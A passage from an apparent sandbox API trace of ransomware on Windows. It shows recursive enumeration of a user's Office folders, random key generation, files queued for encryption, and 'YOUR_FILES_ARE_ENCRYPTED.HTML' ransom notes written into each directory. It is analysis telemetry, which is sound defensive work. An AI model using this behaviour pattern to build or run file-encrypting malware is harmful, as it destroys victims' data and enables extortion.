ftCreationTime.dwLowDateTime=0x816a7a21, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816a7a21, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x816a7a21, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0122.956] StrStrIW (lpFirst="Document Building Blocks", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.956] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned 76 [0122.956] GetProcessHeap () returned 0x600000 [0122.956] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0122.957] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks" [0122.957] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*" [0122.957] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x816a7a21, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816a7a21, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0122.957] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x816a7a21, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x816a7a21, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.957] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0122.957] StrStrIW (lpFirst="1033", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.957] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned 81 [0122.957] GetProcessHeap () returned 0x600000 [0122.957] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0122.959] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" [0122.959] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*" [0122.959] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632aa2, dwReserved1=0x632a08, cFileName=".", cAlternateFileName="")) returned 0x626978 [0122.959] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632aa2, dwReserved1=0x632a08, cFileName="..", cAlternateFileName="")) returned 1 [0122.959] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632aa2, dwReserved1=0x632a08, cFileName="16", cAlternateFileName="")) returned 1 [0122.960] StrStrIW (lpFirst="16", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.960] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned 84 [0122.960] GetProcessHeap () returned 0x600000 [0122.960] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0122.960] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" [0122.961] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*" [0122.961] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x817190ef, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x632a10, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0122.961] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x817190ef, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x632a10, cFileName="..", cAlternateFileName="")) returned 1 [0122.961] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817190ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x817190ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5ca4c63b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0x311b068, dwReserved1=0x632a10, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 1 [0122.961] StrStrIW (lpFirst="Built-In Building Blocks.dotx", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.961] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned 114 [0122.961] PathFindExtensionW (pszPath="Built-In Building Blocks.dotx") returned=".dotx" [0122.961] lstrlenW (lpString=".dotx") returned 5 [0122.961] PathFindExtensionW (pszPath="Built-In Building Blocks.dotx") returned=".dotx" [0122.961] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0122.961] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\built-in building blocks.dotx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0122.963] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=3706055) returned 1 [0122.963] GetProcessHeap () returned 0x600000 [0122.963] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.966] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="0F") returned 2 [0122.966] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="F4") returned 2 [0122.966] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="5F") returned 2 [0122.966] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="6F") returned 2 [0122.966] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="7E") returned 2 [0122.966] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="2A") returned 2 [0122.966] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="CA") returned 2 [0122.966] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="2E") returned 2 [0122.966] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="F7") returned 2 [0122.966] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="1A") returned 2 [0122.966] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="05") returned 2 [0122.966] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="E8") returned 2 [0122.966] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="9B") returned 2 [0122.966] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="81") returned 2 [0122.966] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="48") returned 2 [0122.966] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="B2") returned 2 [0122.966] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="98") returned 2 [0122.966] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="57") returned 2 [0122.966] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="03") returned 2 [0122.966] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="E0") returned 2 [0122.966] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="14") returned 2 [0122.967] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="18") returned 2 [0122.967] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="C1") returned 2 [0122.967] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="B1") returned 2 [0122.967] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="18") returned 2 [0122.967] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="F2") returned 2 [0122.967] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="FC") returned 2 [0122.967] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="77") returned 2 [0122.967] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="A6") returned 2 [0122.967] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="D8") returned 2 [0122.967] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="98") returned 2 [0122.967] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="16") returned 2 [0122.968] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx" [0122.968] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.968] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.968] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x817190ef, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x817190ef, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5ca4c63b, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x388cc7, dwReserved0=0x311b068, dwReserved1=0x632a10, cFileName="Built-In Building Blocks.dotx", cAlternateFileName="BUILT-~1.DOT")) returned 0 [0122.968] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0122.968] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0122.968] GetProcessHeap () returned 0x600000 [0122.968] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0122.969] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\document building blocks\\1033\\16\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0122.970] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0122.971] CloseHandle (hObject=0x320) returned 1 [0122.972] GetProcessHeap () returned 0x600000 [0122.972] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0122.972] GetProcessHeap () returned 0x600000 [0122.972] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0122.972] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632aa2, dwReserved1=0x632a08, cFileName="16", cAlternateFileName="")) returned 0 [0122.972] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0122.972] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 111 [0122.972] GetProcessHeap () returned 0x600000 [0122.972] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0122.972] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\document building blocks\\1033\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0122.973] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0122.975] CloseHandle (hObject=0x324) returned 1 [0122.975] GetProcessHeap () returned 0x600000 [0122.975] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0122.975] GetProcessHeap () returned 0x600000 [0122.975] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0122.977] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81712f94, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x81712f94, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x81712f94, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0122.977] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0122.977] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 106 [0122.977] GetProcessHeap () returned 0x600000 [0122.977] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0122.977] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\document building blocks\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0122.978] WriteFile (in: hFile=0x308, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0122.980] CloseHandle (hObject=0x308) returned 1 [0122.980] GetProcessHeap () returned 0x600000 [0122.980] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0122.980] GetProcessHeap () returned 0x600000 [0122.980] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0122.980] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f1c4e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa92f1c4e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f1c4e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0xff6176b4, cFileName="Excel", cAlternateFileName="")) returned 1 [0122.980] StrStrIW (lpFirst="Excel", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.980] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel") returned 57 [0122.980] GetProcessHeap () returned 0x600000 [0122.980] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0122.980] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel" [0122.980] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\*" [0122.980] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f1c4e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa92f1c4e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f2fe0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0122.981] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f1c4e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa92f1c4e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f2fe0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0122.981] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f2fe0, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa92f2fe0, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f2fe0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f230, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 1 [0122.981] StrStrIW (lpFirst="XLSTART", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.981] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned 65 [0122.981] GetProcessHeap () returned 0x600000 [0122.981] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0122.982] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" [0122.982] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*" [0122.982] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa92f2fe0, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa92f2fe0, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa92f2fe0, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60fcd4, dwReserved1=0x60fc60, cFileName=".", cAlternateFileName="")) returned 0x626978 [0122.984] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, 